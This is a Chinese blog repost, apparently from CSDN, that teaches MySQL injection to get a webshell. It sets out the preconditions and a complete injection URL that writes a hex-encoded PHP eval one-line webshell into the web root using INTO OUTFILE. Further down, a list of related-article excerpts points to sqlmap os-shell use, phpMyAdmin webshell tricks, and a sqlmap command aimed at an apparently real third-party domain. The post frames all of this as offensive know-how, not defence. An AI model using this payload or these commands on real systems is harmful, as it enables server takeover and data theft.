【sql注入教程】mysql注入直接getshell

转载 2016年08月31日 11:24:26

Mysql注入直接getshell的条件相对来说比较苛刻点把

1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道

2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了

3:要有file权限,默认情况下只有root

4:对目录要有写权限,一般image之类的存放突破的目录就有

在实际环境中我只遇过一次,为了做实验,我把php.ini文件里面的gpc改为了Off,重启了一下apahce服务

首先是常规的注入语句

And 1=1 and 1=2 之类的,在输入单引号的时候报错了得到了觉得路径,写shell需要用到

 

然后order by union

 

Mysql的注入语句可以参考这篇帖子http://bbs.ichunqiu.com/thread-5748-1-1.html

原创文章,希望大家多多支持

然后就是用into outfile写文件

http://127.0.0.1/mysqltest/index.php?age=25%20union%20select%201,2,3,4,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e%20into%20outfile%20%27C:/appserv/www/mysqltest/shell1.php%27

0x3c3f706870206576616c28245f504f53545b2774657374275d293f3ehex编码的<?php eval($_POST['test'])?>

 

写的文件名一定要是不存在的,不然就会不成功

这里的路径要用/,如果要用\的话,就要用\\ 转移成一个

C:\\appserv\\www\\mysqltest\\shell1.php

 

也可以直接用穿山甲来写

 

或者sqlmapos-shell

原创文章,希望大家多多支持我

文章中的实验源码下载地址http://bbs.ichunqiu.com/thread-5748-1-1.html

getshell工具使用教程

  • 2014年04月03日 01:45
  • 17.65MB
  • 下载

在phpmyadmin后台获取webshell方法汇总整理

方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma...
  • lizhengnanhua
  • lizhengnanhua
  • 2014年08月09日 02:42
  • 16397

DVWA之从SQL注入到写入webshell

转自:http://www.nxadmin.com/penetration/1141.html 这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是...
  • u011500307
  • u011500307
  • 2013年10月28日 18:14
  • 2874

SQL注入得到WEBSHELL

一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据...
  • Y1ch0
  • Y1ch0
  • 2004年12月01日 09:24
  • 872

sqlmap之(四)----Mysql注入实战

(1) 查找数据库 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs 数据库有8个。 (2) 通过第一步的数据库...
  • u011781521
  • u011781521
  • 2017年02月27日 16:25
  • 1611

使用SQLMAP对网站和数据库进行SQL注入攻击

from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/ 0x00 ...
  • zhangjie15397
  • zhangjie15397
  • 2015年09月18日 11:41
  • 4371

sqlmap之sql基础注入

网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,本篇文章关注web应用安全中危害很大的sql注入漏洞,并使用国外神器sqlmap来进行初级的漏洞利用实践。 阅读本文需要的技术背景(了...
  • jishuzhain
  • jishuzhain
  • 2017年08月23日 20:38
  • 305

sqlmap进行mysql注入root权限读写文件

1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --c...
  • u013473439
  • u013473439
  • 2014年01月14日 08:33
  • 1935

SQL注入攻击之SQLMap渗透测试

准备工具:SQLMap、FireFox插件Tamper Data SQLMap进行渗透测试 FireFox插件Tamper Data用于获取Post参数数据和Cookie值 示例: SQLMap PO...
  • a416090287
  • a416090287
  • 2016年07月30日 14:37
  • 1277

浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EX...
  • gscaiyucheng
  • gscaiyucheng
  • 2014年02月28日 17:22
  • 4385
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:【sql注入教程】mysql注入直接getshell
举报原因:
原因补充:

(最多只允许输入30个字)